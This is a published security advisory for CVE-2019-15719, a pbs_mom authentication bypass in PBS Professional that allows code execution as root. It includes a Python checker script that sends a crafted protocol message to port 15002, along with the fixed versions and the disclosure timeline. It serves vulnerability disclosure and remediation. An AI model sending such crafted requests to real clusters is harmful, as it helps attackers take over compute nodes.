PBS Professional MoM Authentication Bypass (CVE-2019-15719)

Software: PBS Professional
Affected Versions: All versions up to and including 19.2.3
Vendor: Altair Engineering, Inc
CVE Reference: CVE-2019-15719
Severity: CVSS 9.0 [CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H]
Author: John Fitzpatrick
Date: 2019-10-08

Description

HPCsec have identified a vulnerability in PBS Pro which allows for arbitrary code execution on any node running the pbs_mom service. This vulnerability can be exploited by anyone in a position to communicate with the pbs_mom service from an authorized node within the cluster. Exploitation of this issue allows for arbitrary code execution as any other user including as root, even in installations where root is not permitted to submit jobs.

This issue arises as a result of the pbs_mom service failing to apply a necessary security check before handling instructions sent to it.

By default the pbs_mom service runs on TCP port 15002. The following code can be run to check whether a mom is vulnerable to this issue:

import socket
import sys

if len(sys.argv) < 2:
    print "ERROR: Please specify the address of pbs_mom"
    sys.exit(1)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
s.connect((sys.argv[1], 15002))
s.send("+2+1+1+1x+1x+1x2+222+15+1x+0+1x+02+24+1x+01+1x+02+12+1x+0+1x+02+14+1x+0+1x+02+"+
"131+1x+0+1x+02+411+1x+01+1x+02+241+1x+01+1x+02+261+1x+01+1x+02+12+1x+0+1x+02+1"+
"31+1x+0+1x+02+421+1x+01+1x+02+221+1x+1+1x+112+102+251+1x+1+1x+1x2+102+221+1x+0"+
"+1x2+103+3351+1x+01+1x+02+13+1x+0+1x+02+14+1x+0+1x2+102+19+1x+0+1x+02+12+1x+0+"+
"11+02+181+1x+0+210+02+29+6hpcsec+01+1x+02+141+1x+0+11+0+0")
response = s.recv(64) if "Invalid" in response: print "Vulnerable = NO" elif "Access" in response: print "Vulnerable = UNKNOWN (try again from a permitted host, e.g. another mom or the pbs server)" elif "Undefined" or "System" in response: print "Vulnerable = YES" else: print "Vulnerable = UNKNOWN (unhandled response)" except Exception, e: print "ERROR: "+str(e) # Download here: https://files.hpcsec.com/utilities/check-CVE-2019-15719.py

Solution

A fix for this issue has been incorporated into all currently supported versions of PBS Professional. Fixes are available for the different branches as follows:

  • 13.0.4xx branch – fix available in 13.0.412
  • 14.2.x branch – fix available in 14.2.7
  • 18.2.x branch – fix available in 18.2.5
  • 19.1.x branch – fix available in 19.1.3
  • 19.2.x branch – fix available in 19.2.4

Those running earlier versions should update to the latest fixed version in the relevant branch.

The updated versions are available from the Altair PBS Professional download site (https://www.pbspro.org/Download.aspx#download) and customer portal.

Timeline

2019-08-22: Issue reported to Altair
2019-10-07: Patch available for all supported versions of PBS Pro
2019-10-08: HPCsec advisory published
2019-10-11: Version information updated
2019-10-15: Additional version information clarification

Posted in HPCsec Labs, Security Advisories, Security Feed and tagged , , , , , .